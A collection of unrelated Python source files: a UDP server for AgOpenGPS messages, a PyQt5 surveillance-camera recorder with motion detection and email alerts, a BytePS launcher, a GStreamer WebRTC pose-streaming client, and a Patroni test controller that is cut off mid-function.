import socket import threading import time import json import pkg_resources import logging class AgoPgn: """ PGN message from AGOpenGPS: PGN message has a always a HeaderHi and a HeaderLo which are the first two bytes of the message. Then a variable data part follows """ def __init__(self, header_low: int, header_hi: int = 127, data_def: list = None): # Instance attributes self.h_hi: int = header_hi self.h_low: int = header_low self.pgn_number: int = 0 self.descr: str = "Description" self.header: tuple = (self.h_hi, self.h_low) self.data_def: list = data_def self.data: dict = {} def __repr__(self): return str(self.data) def get_pgndef_file(): path = 'pgn_definition.json' # always use slash return pkg_resources.resource_filename(__name__, path) class AgoUdpServer: """ UDP Server which receives data from AGOpenGPS via UDP """ def __init__(self, ip: str = "", port: int = 8888): """ Initalize server """ # Instance attributes self.thread: threading.Thread = None self.ip_address: str = ip self.port: int = port self.serverSock: socket = None self.pgndef: list = [] # storage for PGN definitions (JSON) self.pgndata: dict = {} # storage for data read per PGN (AgoPgn objects) # get IP address of host if not given if ip == "": ip = socket.gethostbyname(socket.gethostname()) self.ip_address = ip # load PGN data definition self.load_pgndef() def load_pgndef(self): """ Load PGN definition """ with open(get_pgndef_file(), "r") as f: self.pgndef = json.load(f) # prepare a PGN object for each definition in the list for d in self.pgndef: pgn = AgoPgn(header_low=d["Header_Lo"], header_hi=d["Header_Hi"], data_def=d["Data"]) pgn.pgn_number = d["PGN"] pgn.descr = d["Description"] self.pgndata[pgn.header] = pgn # add PGN to data dict with header tuple as key def run(self): """ Startup and run server""" # start Server self.serverSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.serverSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.serverSock.bind((self.ip_address, self.port)) logging.info("Server startet: " + self.ip_address + ":" + str(self.port)) while True: data = self.serverSock.recvfrom(1024) # print(f"Message received: ${str(data)}") try: # get message part bdata: bytes = data[0] # get first 2 bytes which should contain the header, as int hd_hi = int(bdata[0]) hd_lo = int(bdata[1]) # construct the tuple / key for the definition hd = (hd_hi, hd_lo) # get definition try: pgn = self.pgndata[hd] # definition found, we want the data datapart = bdata[2:] AgoUdpServer.parse_data(pgn=pgn, data=datapart) except KeyError: # Nothing found for his PGN message key, we are not interested in this message pass except BaseException as ex: logging.exception(f"Exception while receiving message ${str(data)}", ex) raise ex def get_unique_param_value(self, param_id: str): """ Get parameter value via ID; assumes the ID is unique (otherwise returns first value)""" for pgn in self.pgndata.values(): # loop pgns for cur_par_id in pgn.data: # loop parameters if cur_par_id == param_id: return pgn.data[cur_par_id] def get_param_value(self, param_id: str, pgn_header: tuple): """ Get parameter value via ID & PGM message header""" pgn = self.pgndata[pgn_header] return pgn.data[param_id] @staticmethod def parse_data(pgn: AgoPgn, data: bytes): i = 0 data_def_len = len(pgn.data_def) for b in data: # get corresponding data def if not i < (data_def_len - 1): # more data than defined! pgnid = "Undefined" + str(i) pgn.data[pgnid] = b else: # definition available pgn_def = pgn.data_def[i] # set data based on type pgntype = pgn_def["Type"] if pgntype == "int": pgn.data[pgn_def["Id"]] = int(b) elif pgntype == "float": pgn.data[pgn_def["Id"]] = float(b) elif pgntype == "str": pgn.data[pgn_def["Id"]] = str(b) elif pgntype == "bool": pgn.data[pgn_def["Id"]] = bool(b) else: pgn.data[pgn_def["Id"]] = b i += 1 @staticmethod def start_server_thread(ip: str = "", port: int = 8888, name: str = "AgUDPServer"): """ Start UDP server as separate thread """ ago: AgoUdpServer = AgoUdpServer(ip, port) ago.thread = threading.Thread(name=name, target=ago.run, daemon=True) ago.thread.start() return ago def stop_server(self): """ Stop UDP server """ self.serverSock.close() if __name__ == "__main__": """ Start server """ a = AgoUdpServer.start_server_thread() while True: print("Current Data:") for d in a.pgndata.items(): print(d) time.sleep(1)
interface.py
from PyQt5 import QtCore, QtGui, QtWidgets, uic import sys import cv2 import numpy as np import threading import time import queue import re from recordsave import Recorder from ssd_engine import SSD_Detector from motiondetector import MotionDetector from settings import EmailSender # Title WINDOW_TITLE = "DeepEye v1.1 2018" # Cam Params CAM_INDEX = 0 CAM_WIDTH = 1280 CAM_HEIGHT = 720 CAM_FPS = 30 # (record everything mode) This parameter determines the intervals of recording RECORD_INTERVAL = 120 # in seconds # (smart recording mode) This parameter determines how many more frames to save after inactivity RECORD_EXTENSION = 60 # in frame counts # Threading variables cam_running = False capture_thread = None q = queue.Queue() # load UI form_class = uic.loadUiType("interface.ui")[0] # parallel threaded camera feed def grab(cam, queue, width, height, fps): global cam_running cam_running = True capture = cv2.VideoCapture(cam) capture.set(cv2.CAP_PROP_FRAME_WIDTH, width) capture.set(cv2.CAP_PROP_FRAME_HEIGHT, height) capture.set(cv2.CAP_PROP_FPS, fps) while(cam_running): frame = {} capture.grab() retval, img = capture.retrieve(0) frame["img"] = img if queue.qsize() < 10: queue.put(frame) else: print (queue.qsize()) print("Terminated camera feed") class MyWindowClass(QtWidgets.QMainWindow, form_class): def __init__(self, parent=None): QtWidgets.QMainWindow.__init__(self, parent) self.setupUi(self) self.setFixedSize(self.size()) # obtain dim of elements self.triggerGroupDim = [self.triggerGroup.geometry().width(),self.triggerGroup.geometry().height()] self.recordButtonDim = [self.recordButton.geometry().width(),self.recordButton.geometry().height()] self.filepathTextDim = [self.filepathText.geometry().width(),self.filepathText.geometry().height()] # Livefeed tab: self.window_width = self.live_display.frameSize().width() self.window_height = self.live_display.frameSize().height() self.live_display.setStyleSheet("QLabel { background-color : black}") self.timer = QtCore.QTimer(self) self.timer.timeout.connect(self.update_frame) self.timer.start(1) self.datetimeTagLocation = (10,30) self.datetimeTagColour = (0,255,0) # Recorder object self.record = Recorder(CAM_WIDTH, CAM_HEIGHT, CAM_FPS) self.recordButton.clicked.connect(self.record_to) self.timetracker = -1 self.subjectCheck.stateChanged.connect(self.record_on_detection) self.recordOnPresence = False self.inactiveCount = 0 self.isDetected = False self.motionCheck.stateChanged.connect(self.record_on_motion) self.recordOnMotion = False self.isMoving = False self.noMotionCount = 0 self.motionTagLocation = (CAM_WIDTH-300,30) self.motionTagColour = (0,0,255) # Detector object self.detector = SSD_Detector() if not self.detector.ready: self.subjectCheck.setEnabled(False) # Motion detector object self.motiondetect = MotionDetector() # email alert module self.emailsender = EmailSender() self.sendOnActivity = False self.sendoutStartTime = -1 self.emailsetupButton.clicked.connect(self.emailAlertSetup) self.testemailButton.clicked.connect(self.emailSendTest) self.sendemailCheck.stateChanged.connect(self.emailSendToggleFunc) self.password_input.setEchoMode(QtWidgets.QLineEdit.Password) self.port_input.setValidator(QtGui.QIntValidator(0,999)) if self.emailsender.getSetupFlag(): email_address, email_password, smtp, port = self.emailsender.getLoginDetails() self.email_input.setText(email_address) self.password_input.setText(email_password) self.smtp_input.setText(smtp) self.port_input.setText(str(port)) # Disable user interface self.emailGroup.setEnabled(False) self.testemailButton.setEnabled(True) self.sendemailCheck.setEnabled(True) self.emailsetupButton.setText("Change") def emailSendToggleFunc(self): if self.sendemailCheck.isChecked(): self.sendOnActivity = True else: self.sendOnActivity = False self.sendoutStartTime = -1 def emailSendTest(self): if self.emailsender.getSetupFlag(): self.emailsender.send_testmsg() def emailAlertSetup(self): if self.emailsetupButton.text() == "Setup": if not self.emailsender.getSetupFlag(): email_address = self.email_input.text() email_password = self.password_input.text() smtp = self.smtp_input.text() port = self.port_input.text() # simple check to evaluate input validity check_email_pattern = re.compile('[^@]+@[^@]+\.[^@]+') if not check_email_pattern.match(email_address): self.err_email_label.setText("Invalid Email") else: self.err_email_label.setText("") self.emailsender.login_setup(email_address,email_password,smtp,int(port)) if self.emailsender.getSetupFlag(): # If successfully logged in self.emailGroup.setEnabled(False) self.testemailButton.setEnabled(True) self.sendemailCheck.setEnabled(True) self.emailsetupButton.setText("Change") else: # authentication failed self.err_email_label.setText("Authentication Failed!") else: self.emailsender.close_connection() self.emailGroup.setEnabled(True) self.testemailButton.setEnabled(False) self.sendemailCheck.setEnabled(False) self.emailsetupButton.setText("Setup") def emailSendTracker(self, isDetected): currentDateTime = QtCore.QTime.currentTime().toString(QtCore.Qt.DefaultLocaleLongDate).split() currentDayLight = currentDateTime[1] currentTime = currentDateTime[0].split(':') currentTimeSeconds = int(currentTime[0])*3600 + int(currentTime[1])*60 + int(currentTime[2]) if isDetected: if self.sendoutStartTime == -1: # initialize # send out first email here print("Activity started: Send out first email") self.emailsender.send_emailalert(True,currentTimeSeconds,currentDayLight) self.sendoutStartTime = currentTimeSeconds else: # invoke timeout sequence (2 mins of inactivity, send out last email) if self.sendoutStartTime > -1: if currentTimeSeconds - self.sendoutStartTime > RECORD_INTERVAL: print("Activity ended: Send out last email") self.emailsender.send_emailalert(False,currentTimeSeconds,currentDayLight) self.sendoutStartTime = -1 def resizeEvent(self,event): # readjust ui according to window size # MainWindow.textEdit.setGeometry(QtCore.QRect(30, 80, 341, 441)) curr_mainframe_w = self.frameSize().width() curr_mainframe_h = self.frameSize().height() # Adjust tab widget size fixed_tab_x = self.tabWidget.geometry().x() fixed_tab_y = self.tabWidget.geometry().y() new_tab_w = curr_mainframe_w - 40 new_tab_h = curr_mainframe_h - 80 self.tabWidget.resize(new_tab_w,new_tab_h) # **** Set all elements relative to tabWidget_relativeSizeRatio **** # set triggerGroup Pos: new_trigger_x = fixed_tab_x + (new_tab_w - self.triggerGroupDim[0] - 40) new_trigger_y = fixed_tab_y self.triggerGroup.move(new_trigger_x,new_trigger_y) # set recordButton Pos: new_recordbtn_x = fixed_tab_x + (new_tab_w/2 - self.recordButtonDim[0]) new_recordbtn_y = fixed_tab_y + (new_tab_h - self.recordButtonDim[1] - 80) self.recordButton.move(new_recordbtn_x,new_recordbtn_y) # set filePath Pos: new_filepath_x = fixed_tab_x new_filepath_y = new_recordbtn_y - self.filepathTextDim[1] - 20 self.filepathText.move(new_filepath_x,new_filepath_y) # finally set the display size self.window_width = new_trigger_x - 40 self.window_height = new_filepath_y - 40 self.live_display.resize(self.window_width,self.window_height) def record_to(self): if self.record.getPreDefinedFilePath() == "undefined": # return filepath where video is saved dir_ = QtWidgets.QFileDialog.getExistingDirectory(None, 'Select a folder for record output:', '~/', QtWidgets.QFileDialog.ShowDirsOnly) if len(dir_) > 0: self.record.setPreDefinedFilePath(dir_) self.filepathText.setText('Saving video to: ' + dir_) else: self.record.setPreDefinedFilePath("undefined") else: if self.record.getRecordingStatus(): # stop recording self.record.turnOffRecording() self.recordButton.setText('Record') else: self.record.invokeRecording() if self.record.getRecordingStatus(): self.recordButton.setText('Stop') def record_on_detection(self): if self.subjectCheck.isChecked(): self.recordOnPresence = True else: self.recordOnPresence = False def record_on_motion(self): if self.motionCheck.isChecked(): self.recordOnMotion = True else: self.recordOnMotion = False def recordTriggerFunc(self, frame): # record on presence only if self.recordOnPresence and not self.recordOnMotion: if self.isDetected: if self.inactiveCount >= RECORD_INTERVAL: # estimate 2 sec of detect nothing self.record.invokeRecording() #reinitalize self.record.vidWriter.write(frame) self.inactiveCount = 0 else: if self.inactiveCount < RECORD_INTERVAL: self.inactiveCount += 1 else: self.record.killRecorder() elif self.recordOnMotion and not self.recordOnPresence: if self.isMoving: if self.noMotionCount >= RECORD_INTERVAL: self.record.invokeRecording() self.record.vidWriter.write(frame) self.noMotionCount = 0 else: if self.noMotionCount < RECORD_INTERVAL: self.noMotionCount += 1 else: self.record.killRecorder() elif self.recordOnMotion and self.recordOnPresence: if self.isDetected or self.isMoving: if self.inactiveCount >= RECORD_INTERVAL and self.noMotionCount >= RECORD_INTERVAL: self.record.invokeRecording() self.record.vidWriter.write(frame) self.inactiveCount = 0 self.noMotionCount = 0 else: assessOne = False assessTwo = False if self.noMotionCount < RECORD_INTERVAL: self.noMotionCount += 1 else: assessOne = True if self.inactiveCount < RECORD_INTERVAL: self.inactiveCount += 1 else: assessTwo = True if assessOne and assessTwo: self.record.killRecorder() else: # Record everything in interval of 2 minutes if self.timetracker == -1: self.timetracker = self.record.getCurrentTime() else: ref_hr, ref_min, ref_sec, _ = self.timetracker.split('_') refTimeInSeconds = int(ref_min)*60 + int(ref_sec) cur_hr, cur_min, cur_sec, _ = self.record.getCurrentTime().split('_') curTimeInSeconds = int(cur_min)*60 + int(cur_sec) if curTimeInSeconds - refTimeInSeconds >= RECORD_INTERVAL: self.record.invokeRecording() self.timetracker = self.record.getCurrentTime() self.record.vidWriter.write(frame) def drawOnFrame(self, inputImg, isMotion): # Tag date cv2.putText(inputImg,self.record.getDisplayLabel(), self.datetimeTagLocation, cv2.FONT_HERSHEY_SIMPLEX, 1, self.datetimeTagColour, 2, cv2.LINE_AA) # Tag motion indicator if isMotion: cv2.putText(inputImg,"Motion Detected!", self.motionTagLocation, cv2.FONT_HERSHEY_SIMPLEX, 1, self.motionTagColour, 2, cv2.LINE_AA) def displayFrame(self, img): img_height, img_width, img_colors = img.shape scale_w = float(self.window_width) / float(img_width) scale_h = float(self.window_height) / float(img_height) scale = min([scale_w, scale_h]) if scale == 0: scale = 1 img = cv2.resize(img, None, fx=scale, fy=scale, interpolation = cv2.INTER_CUBIC) img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) height, width, bpc = img.shape bpl = bpc * width image = QtGui.QImage(img.data, width, height, bpl, QtGui.QImage.Format_RGB888) pix = QtGui.QPixmap(image) self.live_display.setPixmap(pix) # Live Mode def update_frame(self): if not q.empty(): # UI thingy self.recordButton.setEnabled(True) # grab frame from video thread try: frame = q.get() img = frame["img"] except: print("error obtaining images") else: # detect motion if self.recordOnMotion: # detect motion motionImg = img.copy() self.isMoving = self.motiondetect.detectmotion(motionImg) else: self.isMoving = False # detect presence if self.recordOnPresence: # detect objects and indicate on display img, self.isDetected = self.detector.process_image(img) else: self.isDetected = False if self.sendOnActivity: if self.isMoving or self.isDetected: self.emailSendTracker(True) else: self.emailSendTracker(False) # Tag the frame with indications self.drawOnFrame(img,self.isMoving) if self.record.getRecordingStatus(): self.recordTriggerFunc(img) # show frame with annotation self.displayFrame(img) def closeEvent(self, event): global cam_running cam_running = False self.record.killRecorder() def main(): capture_thread = threading.Thread(target=grab, args = (CAM_INDEX, q, CAM_WIDTH, CAM_HEIGHT, CAM_FPS)) capture_thread.start() app = QtWidgets.QApplication(sys.argv) w = MyWindowClass(None) w.setWindowTitle(WINDOW_TITLE) w.show() app.exec_() main()
launch.py
#!/usr/bin/python from __future__ import print_function import os import subprocess import threading import sys import time def worker(local_rank, local_size, command): my_env = os.environ.copy() my_env["BYTEPS_LOCAL_RANK"] = str(local_rank) my_env["BYTEPS_LOCAL_SIZE"] = str(local_size) if os.getenv("BYTEPS_ENABLE_GDB", 0): if command.find("python") != 0: command = "python " + command command = "gdb -ex 'run' -ex 'bt' -batch --args " + command subprocess.check_call(command, env=my_env, stdout=sys.stdout, stderr=sys.stderr, shell=True) if __name__ == "__main__": print("BytePS launching " + os.environ["DMLC_ROLE"]) sys.stdout.flush() if os.environ["DMLC_ROLE"] == "worker": if "NVIDIA_VISIBLE_DEVICES" in os.environ: local_size = len(os.environ["NVIDIA_VISIBLE_DEVICES"].split(",")) else: local_size = 1 t = [None] * local_size for i in range(local_size): command = ' '.join(sys.argv[1:]) t[i] = threading.Thread(target=worker, args=[i, local_size, command]) t[i].daemon = True t[i].start() for i in range(local_size): t[i].join() else: if "BYTEPS_SERVER_MXNET_PATH" not in os.environ: print("BYTEPS_SERVER_MXNET_PATH env not set") os._exit(0) sys.path.insert(0, os.getenv("BYTEPS_SERVER_MXNET_PATH")+"/python") import mxnet
appsrc-py-appsink3.py
import random import ssl import websockets import asyncio import threading import os import sys import json import argparse import time from io import BytesIO import cv2 import numpy import sys import mp as pn detector = pn.Model() import gi gi.require_version('Gst', '1.0') from gi.repository import Gst, GObject, GLib gi.require_version('GstWebRTC', '1.0') from gi.repository import GstWebRTC gi.require_version('GstSdp', '1.0') from gi.repository import GstSdp gi.require_version('GstApp', '1.0') from websockets.version import version as wsv #GObject.threads_init() # Main pipeline here: PIPELINE_DESC2 = ''' webrtcbin name=sendrecv bundle-policy=max-bundle stun-server=stun://stun.l.google.com:19302 videotestsrc is-live=true pattern=ball ! videoconvert ! queue ! vp8enc deadline=1 ! rtpvp8pay ! queue ! application/x-rtp,media=video,encoding-name=VP8,payload=97 ! sendrecv. ''' image_arr = None sender = None pipetmp = None caps_global = None class WebRTCClient: def __init__(self, id_, peer_id, server): self.id_ = id_ self.conn = None # self.conn_meta = None self.pipe = None self.pipe2 = None self.webrtc = None self.peer_id = peer_id self.stun_server = "stun://stun.l.google.com:19302" self.server = server or 'wss://dxmpp.online:8443' # self.server_meta = 'wss://dxmpp.online:8000' self.is_push_buffer_allowed = False self._mainloop = GLib.MainLoop() self._src = None self.image_arr = numpy.zeros((480,640,3), numpy.uint8) # Framerate control attributes: self.done_processing = True self.interval_ms = 33 self.frame_stamp = 0 self.thread_1 = None self.arr = None def gst_to_opencv(self, sample): buf = sample.get_buffer() buff=buf.extract_dup(0, buf.get_size()) global caps_global caps = sample.get_caps() caps_global = caps #print(caps.get_structure(0).get_value('format')) #print(caps.get_structure(0).get_value('height')) #print(caps.get_structure(0).get_value('width')) # print(buf.get_size()) arr = numpy.ndarray((caps.get_structure(0).get_value('height'), caps.get_structure(0).get_value('width'), 3), buffer=buff, dtype=numpy.uint8) return arr def process_buffer(self): self.done_processing = False metadata, self.image_arr = detector.posenet_detect(self.arr) # Send metadata via Websocket connection msg = json.dumps({"keypoints": metadata}) #msg = '{' + "'keypoints': " + f"{metadata}" + '}' # Produce to Kafka topic #producer.send('pose_meta', key=b'keypoints', value=msg.encode('utf-8')) try: loop = asyncio.new_event_loop() loop.run_until_complete(self.conn.send(msg)) loop.close() except: print('Meta transmission error') self.done_processing = True def new_buffer(self, sink, data): time_now = 1000 * time.time() real_frame_interval = time_now - self.frame_stamp self.frame_stamp = time_now print("-----------------> Frametime: ", real_frame_interval) sample = sink.emit("pull-sample") if (self.done_processing is True): # and (real_frame_interval >= self.interval_ms)): self.arr = self.gst_to_opencv(sample) a = 1000 * time.time() self.arr = cv2.resize(self.arr, (640, 480), interpolation = cv2.INTER_NEAREST) self.arr = cv2.flip(self.arr, 1) threading.Thread(target=self.process_buffer).start() #self.image_arr = self.arr print("====> Time to process a frame: ", ((1000 * time.time()) - a)) return Gst.FlowReturn.OK def start_feed(self, src, length): #print('======================> need data length: %s' % length) self.is_push_buffer_allowed = True #ret,thresh1 = cv2.threshold(image_arr,127,255,cv2.THRESH_BINARY) #metadata, self.image_arr = detector.posenet_detect(self.image_arr) self.push(self.image_arr) def stop_feed(self, src): #print('======================> enough_data') self.is_push_buffer_allowed = False def run(self): """ Run - blocking. """ self._mainloop.run() def push(self, data): #print('Push a buffer into the source') if self.is_push_buffer_allowed: # print('Push allowed') data1 = data.tobytes() buf = Gst.Buffer.new_allocate(None, len(data1), None) buf.fill(0, data1) # Create GstSample sample = Gst.Sample.new(buf, Gst.caps_from_string("video/x-raw,format=BGR,width=640,height=480,framerate=(fraction)30/1"), None, None) # Push Sample on appsrc gst_flow_return = self._src.emit('push-sample', sample) if gst_flow_return != Gst.FlowReturn.OK: print('We got some error, stop sending data') else: pass #print('It is enough data for buffer....') async def connect(self): print('Connect stage!') sslctx = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH) self.conn = await websockets.connect(self.server, ssl=sslctx) self.conn_meta = await websockets.connect(self.server_meta, ssl=sslctx) await self.conn.send('HELLO %d' % self.id_) await self.conn_meta.send('HELLO %d' % self.id_) async def setup_call(self): print('Setup call stage!') await self.conn.send('SESSION {}'.format(self.peer_id)) def send_sdp_offer(self, offer): print('Send SDP offer stage!') text = offer.sdp.as_text() print ('Sending offer:\n%s' % text) msg = json.dumps({'sdp': {'type': 'offer', 'sdp': text}}) loop = asyncio.new_event_loop() loop.run_until_complete(self.conn.send(msg)) loop.close() def on_offer_created(self, promise, _, __): print('on_offer_created stage!') promise.wait() reply = promise.get_reply() offer = reply.get_value('offer') promise = Gst.Promise.new() self.webrtc.emit('set-local-description', offer, promise) promise.interrupt() self.send_sdp_offer(offer) def on_negotiation_needed(self, element): print('on_negotiation_needed stage!') promise = Gst.Promise.new_with_change_func(self.on_offer_created, element, None) element.emit('create-offer', None, promise) def send_ice_candidate_message(self, _, mlineindex, candidate): print('Send ice candidate stage!') icemsg = json.dumps({'ice': {'candidate': candidate, 'sdpMLineIndex': mlineindex}}) loop = asyncio.new_event_loop() loop.run_until_complete(self.conn.send(icemsg)) loop.close() def on_incoming_decodebin_stream(self, _, pad): print('On incoming decodebin stream stage!') if not pad.has_current_caps(): print (pad, 'has no caps, ignoring') return # caps = pad.get_current_caps() caps = Gst.caps_from_string("video/x-raw, format=(string){BGR, GRAY8}; video/x-bayer,format=(string){rggb,bggr,grbg,gbrg},framerate=30/1") # print(caps.get_structure(0).get_value('format')) # print(caps.get_structure(0).get_value('height')) # print(caps.get_structure(0).get_value('width')) name = caps.to_string() if name.startswith('video'): q = Gst.ElementFactory.make('queue2') #capsfilter = Gst.ElementFactory.make('capsfilter') #capsfilter.set_property("caps", Gst.caps_from_string("video/x-raw,framerate=(fraction)30/1")) conv = Gst.ElementFactory.make('videoconvert') r = Gst.ElementFactory.make('videorate') #r.set_property("max-rate", 30) # sink = Gst.ElementFactory.make('autovideosink') sink = Gst.ElementFactory.make('appsink', 'sink') #q.set_property("max-size-bytes", 65586) sink.set_property("emit-signals", True) sink.set_property("enable-last-sample", False) sink.set_property("sync", False) sink.set_property("drop", True) sink.set_property("async", True) sink.set_property("max-buffers", 2) #sink.set_property("max-lateness", 66000000) sink.set_property("caps", caps) self.pipe.add(q) self.pipe.add(conv) #self.pipe.add(r) self.pipe.add(sink) self.pipe.sync_children_states() pad.link(q.get_static_pad('sink')) q.link(conv) #capsfilter.link(conv) #pad.link(r.get_static_pad('sink')) #r.link(conv) conv.link(sink) #r.link(sink) sink.connect("new-sample", self.new_buffer, sink) elif name.startswith('audio'): pass def on_incoming_stream(self, _, pad): print('On incoming stream stage!') if pad.direction != Gst.PadDirection.SRC: print('Pad Direction not source!') return decodebin = Gst.ElementFactory.make('decodebin') decodebin.connect('pad-added', self.on_incoming_decodebin_stream) #decodebin.set_property('use-buffering', False) #decodebin.set_property('max-size-buffers', 1) print('Called on incoming decodebin stream!') self.pipe.add(decodebin) decodebin.sync_state_with_parent() self.webrtc.link(decodebin) def start_pipeline(self): print('Starting pipeline!') #caps_src = Gst.caps_from_string("video/x-raw,format=BGR,width=640,height=480,framerate=(fraction)30/1") self.pipe = Gst.parse_launch(PIPELINE_DESC2) self.webrtc = self.pipe.get_by_name('sendrecv') self.webrtc.connect('on-negotiation-needed', self.on_negotiation_needed) self.webrtc.connect('on-ice-candidate', self.send_ice_candidate_message) self.webrtc.connect('pad-added', self.on_incoming_stream) self._src = self.pipe.get_by_name('source1') self._src.set_property('emit-signals', True) #self._src.set_property('leaky-type', 2) #self._src.set_property('max-bytes', 1000) self._src.set_property('max-bytes', 1000000) #self._src.set_property('caps', caps_src) self._src.set_property('format', 'time') self._src.set_property('do-timestamp', True) self._src.connect('need-data', self.start_feed) self._src.connect('enough-data', self.stop_feed) self.pipe.set_state(Gst.State.PLAYING) def handle_sdp(self, message): print('Handle sdp message stage!') #assert (self.webrtc) msg = json.loads(message) if 'sdp' in msg: sdp = msg['sdp'] print(sdp['type'], sdp['sdp']) #assert(sdp['type'] == 'answer') sdp = sdp['sdp'] print ('Received answer:\n%s' % sdp) res, sdpmsg = GstSdp.SDPMessage.new() GstSdp.sdp_message_parse_buffer(bytes(sdp.encode()), sdpmsg) answer = GstWebRTC.WebRTCSessionDescription.new(GstWebRTC.WebRTCSDPType.ANSWER, sdpmsg) promise = Gst.Promise.new() self.webrtc.emit('set-remote-description', answer, promise) promise.interrupt() elif 'ice' in msg: ice = msg['ice'] candidate = ice['candidate'] sdpmlineindex = ice['sdpMLineIndex'] self.webrtc.emit('add-ice-candidate', sdpmlineindex, candidate) def close_pipeline(self): try: self.pipe.set_state(Gst.State.NULL) except: pass self.pipe = None self.webrtc = None async def loop(self): assert self.conn async for message in self.conn: print(message) sdpoffer = "offer" if message == 'HELLO': pass #await self.setup_call() elif message == 'SESSION_OK': print('SESSION OK!!!') #self.start_pipeline() elif message.startswith('ERROR'): print (message) self.close_pipeline() return 1 elif sdpoffer in message: print('SDP OFFER IN MESSAGE') self.start_pipeline() else: self.handle_sdp(message) self.close_pipeline() return 0 async def stop(self): if self.conn: await self.conn.close() await self.conn_meta.close() self.conn = None def check_plugins(): needed = ["opus", "vpx", "nice", "webrtc", "dtls", "srtp", "rtp", "rtpmanager", "videotestsrc", "audiotestsrc"] missing = list(filter(lambda p: Gst.Registry.get().find_plugin(p) is None, needed)) if len(missing): print('Missing gstreamer plugins:', missing) return False return True if __name__=='__main__': while True: Gst.init(None) if not check_plugins(): sys.exit(1) parser = argparse.ArgumentParser() parser.add_argument('peerid', help='String ID of the peer to connect to') parser.add_argument('--server', help='Signalling server to connect to, eg "wss://127.0.0.1:8443"') args = parser.parse_args() our_id = 7331 c = WebRTCClient(our_id, args.peerid, args.server) loop = asyncio.get_event_loop() loop.run_until_complete(c.connect()) res = loop.run_until_complete(c.loop()) #sys.exit(res)
environment.py
import abc import consul import datetime import etcd import kazoo.client import kazoo.exceptions import os import psutil import psycopg2 import json import shutil import signal import six import subprocess import tempfile import threading import time import yaml @six.add_metaclass(abc.ABCMeta) class AbstractController(object): def __init__(self, context, name, work_directory, output_dir): self._context = context self._name = name self._work_directory = work_directory self._output_dir = output_dir self._handle = None self._log = None def _has_started(self): return self._handle and self._handle.pid and self._handle.poll() is None def _is_running(self): return self._has_started() @abc.abstractmethod def _is_accessible(self): """process is accessible for queries""" @abc.abstractmethod def _start(self): """start process""" def start(self, max_wait_limit=5): if self._is_running(): return True self._log = open(os.path.join(self._output_dir, self._name + '.log'), 'a') self._handle = self._start() assert self._has_started(), "Process {0} is not running after being started".format(self._name) max_wait_limit *= self._context.timeout_multiplier for _ in range(max_wait_limit): if self._is_accessible(): break time.sleep(1) else: assert False,\ "{0} instance is not available for queries after {1} seconds".format(self._name, max_wait_limit) def stop(self, kill=False, timeout=15, _=False): term = False start_time = time.time() timeout *= self._context.timeout_multiplier while self._handle and self._is_running(): if kill: self._handle.kill() elif not term: self._handle.terminate() term = True time.sleep(1) if not kill and time.time() - start_time > timeout: kill = True if self._log: self._log.close() def cancel_background(self): pass class PatroniController(AbstractController): __PORT = 5440 PATRONI_CONFIG = '{}.yml' """ starts and stops individual patronis""" def __init__(self, context, name, work_directory, output_dir, custom_config=None): super(PatroniController, self).__init__(context, 'patroni_' + name, work_directory, output_dir) PatroniController.__PORT += 1 self._data_dir = os.path.join(work_directory, 'data', name) self._connstring = None if custom_config and 'watchdog' in custom_config: self.watchdog = WatchdogMonitor(name, work_directory, output_dir) custom_config['watchdog'] = {'driver': 'testing', 'device': self.watchdog.fifo_path, 'mode': 'required'} else: self.watchdog = None self._scope = (custom_config or {}).get('scope', 'batman') self._config = self._make_patroni_test_config(name, custom_config) self._closables = [] self._conn = None self._curs = None def write_label(self, content): with open(os.path.join(self._data_dir, 'label'), 'w') as f: f.write(content) def read_label(self): try: with open(os.path.join(self._data_dir, 'label'), 'r') as f: return f.read().strip() except IOError: return None @staticmethod def recursive_update(dst, src): for k, v in src.items(): if k in dst and isinstance(dst[k], dict): PatroniController.recursive_update(dst[k], v) else: dst[k] = v def update_config(self, custom_config): with open(self._config) as r: config = yaml.safe_load(r) self.recursive_update(config, custom_config) with open(self._config, 'w') as w: yaml.safe_dump(config, w, default_flow_style=False) self._scope = config.get('scope', 'batman') def add_tag_to_config(self, tag, value): self.update_config({'tags': {tag: value}}) def _start(self): if self.watchdog: self.watchdog.start() if isinstance(self._context.dcs_ctl, KubernetesController): self._context.dcs_ctl.create_pod(self._name[8:], self._scope) os.environ['PATRONI_KUBERNETES_POD_IP'] = '10.0.0.' + self._name[-1] return subprocess.Popen(['coverage', 'run', '--source=patroni', '-p', 'patroni.py', self._config], stdout=self._log, stderr=subprocess.STDOUT, cwd=self._work_directory) def stop(self, kill=False, timeout=15, postgres=False): if postgres: return subprocess.call(['pg_ctl', '-D', self._data_dir, 'stop', '-mi', '-w']) super(PatroniController, self).stop(kill, timeout) if isinstance(self._context.dcs_ctl, KubernetesController): self._context.dcs_ctl.delete_pod(self._name[8:]) if self.watchdog: self.watchdog.stop() def _is_accessible(self): cursor = self.query("SELECT 1", fail_ok=True) if cursor is not None: cursor.execute("SET synchronous_commit TO 'local'") return True def _make_patroni_test_config(self, name, custom_config): patroni_config_name = self.PATRONI_CONFIG.format(name) patroni_config_path = os.path.join(self._output_dir, patroni_config_name) with open(patroni_config_name) as f: config = yaml.safe_load(f) config.pop('etcd', None) host = config['postgresql']['listen'].split(':')[0] config['postgresql']['listen'] = config['postgresql']['connect_address'] = '{0}:{1}'.format(host, self.__PORT) config['name'] = name config['postgresql']['data_dir'] = self._data_dir config['postgresql']['use_unix_socket'] = True config['postgresql']['parameters'].update({ 'logging_collector': 'on', 'log_destination': 'csvlog', 'log_directory': self._output_dir, 'log_filename': name + '.log', 'log_statement': 'all', 'log_min_messages': 'debug1', 'unix_socket_directories': self._data_dir}) if 'bootstrap' in config: config['bootstrap']['post_bootstrap'] = 'psql -w -c "SELECT 1"' if 'initdb' in config['bootstrap']: config['bootstrap']['initdb'].extend([{'auth': 'md5'}, {'auth-host': 'md5'}]) if custom_config is not None: self.recursive_update(config, custom_config) if config['postgresql'].get('callbacks', {}).get('on_role_change'): config['postgresql']['callbacks']['on_role_change'] += ' ' + str(self.__PORT) with open(patroni_config_path, 'w') as f: yaml.safe_dump(config, f, default_flow_style=False) user = config['postgresql'].get('authentication', config['postgresql']).get('superuser', {}) self._connkwargs = {k: user[n] for n, k in [('username', 'user'), ('password', 'password')] if n in user} self._connkwargs.update({'host': host, 'port': self.__PORT, 'database': 